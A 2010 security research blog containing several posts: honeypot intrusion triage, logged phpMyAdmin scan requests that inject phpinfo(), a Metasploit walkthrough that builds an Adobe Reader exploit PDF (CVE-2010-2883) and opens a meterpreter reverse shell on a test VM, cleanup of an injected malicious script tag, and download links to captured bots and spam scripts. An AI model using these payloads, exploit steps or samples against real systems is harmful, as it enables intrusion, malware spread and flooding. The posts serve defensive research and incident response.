Tuesday, September 28, 2010

Intruder alert

It's 4 o clock in the morning and the CISCO intrusion alert system is flash red "Possible security breach" in the big wall screen whilst alerting the sysadmins with voice mails and e-mails ... or maybe I'm still dreaming and this was part of a movie. Still there is an alert on my telephone laying down on the floor next to me with a message, "there must be something here". This is a default message that I've put in a series of bash scripts running under cron every now and then, to alert me for possible filesystem changes and files or directories created where they are not supposed to be.

I've been running some custom honeypots windows and linux for some time now in order to collect malware bots and other goodies, mostly for hobby.

This time the alert came from a linux system, that's running an old phpmyadmin package, it's the second time during a month that the system gets compromised, so there is a lot of activity in phpmyadmin scans both on linux and on windows systems.

Logging in the system immediately i checked the processes running, it's common on these attacks that the attacker will be hiding bot or backdoor with a fake process name. Most of the attackers are masking their backdoors or bots under httpd or apache process making it less obvious for the sysadmin to locate the binary in the first glance.

This time the binary was running under rpc.idmapd name
nobody   15550  0.0  3.1  44368 30928 ?        S    04:11   0:06 rpc.idmapd

Easy to spot since the process didn't belong to this specific system configuration. Locating the location of the binary is easy using lsof command. lsof -p 15550 gave the where about of the binary and the open connections. Here most of the times I'm keeping a process dump for further analysis using pcat from tct ( http://www.porcupine.org/forensics/tct.html ) there are many good information that can be found in the active memory dump of the process, like connection strings, username and passwords etc.

This time the binary was, again, a mech bot ( http://www.energymech.net/ ) connecting to quakenet irc network, nothing interesting here :/ hope the attackers will be more creative next time.

Bot packed, http://www.deventum.com/research/15550.tar.gz

Sunday, September 12, 2010

Phpmyadmin scans

Sunday night and the weather is getting colder, kids asleep, a nice time to check on honeypot logs. Some days ago SANS reported a new at that time binary "dd_ssh"  ( http://isc.sans.edu/diary.html?storyid=9370 ) and it related the attack on the phpMyAdmin vulnerability. Honeypot is grabbing some URLs also possibly related on the same attack vector.

GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1

There is one user agent that is appearing in the logs also " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ", the report on whithat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...

Thursday, September 9, 2010

Adobe 0day cooltype and metasploit

Once more metasploit is way ahead of competition, this time with a 0day for adobe pdf reader. Having some time today i thought i give it a try.

In a windows 7 vm, i got the latest pdf reader from adobe  ( version 9.3.4 at the moment )

Now on the metasploit console,

root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >

msf exploit(adobe_cooltype_sing) > info

       Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Unknown
   <@sn0wfl0w>
   <@vicheck>
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                 Required  Description
  ----        ---------------                 --------  -----------
  FILENAME    msf.pdf                         yes       The file name.
  OUTPUTPATH  /home/root/trunk/data/exploits  yes       The location of the file.

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the Smart INdependent
  Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
  Adobe Reader. Prior version are assumed to be vulnerable as well.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
  http://www.osvdb.org/67849
  http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
  http://www.adobe.com/support/security/advisories/apsa10-02.html


msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >

Let's get the msf.pdf now and start a generic handler on the msfconsole.



msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

On the windows 7 now, 

Clicking the msf icon,


No luck at the moment on windows 7, the application crashed with no session. Trying the same on windows XP the screen shows the following:


And on our server we have:

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010

meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >

I hope it won't take long for the windows 7 version.

Infected website cleaning

Having a lot of websites to monitor many times even in the ones most updated you might find backdoors or other goodies. A couple of days ago a client called and said that google was blocking through safe browsing his website, at least one of them, and another one was popping advertisements when visited. It came to my surprise that those sites were infected because i knew that they were updated recently and to my knowledge there was no vulnerability for the latest update.

Poking around a bit it didn't took long to realize that the infection was done through ftp and there was no sql injection or any other vulnerability in the code of the website.

Most of the time, my work finishes there i will tell the client to clean up the code and change the ftp password. In this case the client was also a good friend and i thought to give him a bit of help there.

The infected files where .php and .html files with the following code,

script src="hxxp://youngarea.ru/Vector.js" type="text/javascript"

grep gave the following result,

# grep -R youngarea *| wc
    140     420   16869

140 files infected, cleaning them one by one could take some time.

Sed to the rescue !

The following command is looking at the current directory for files ending with php extension and is replacing the lines starting with < , containing youngarea and ending with > with nothing, thus cleaning up the infection.

find . -name "*.php" -type f | xargs sed -i 's/<.*youngarea.*>//g'

The same command was applied also for the files ending with .html

find . -name "*.html" -type f | xargs sed -i 's/<.*youngarea.*>//g'

and the website was clean in a couple of seconds.

Monday, September 6, 2010

Floodbots and more

Another collection from the honeypot, floodbots and spam scripts. This one personally I have seen it a lot of times in different servers (sender,  From: HSBC )  at /tmp directory under the name a/ and ".     "

Spam sending scripts at http://www.deventum.com/research/spam.tar.gz , a poor 's man perl bot from TeaMrx team http://www.deventum.com/research/fetch.txt and finally an eggdrop with flood added modules capable for more than 50mbps flood traffic at http://www.deventum.com/research/floodbots2.tar.gz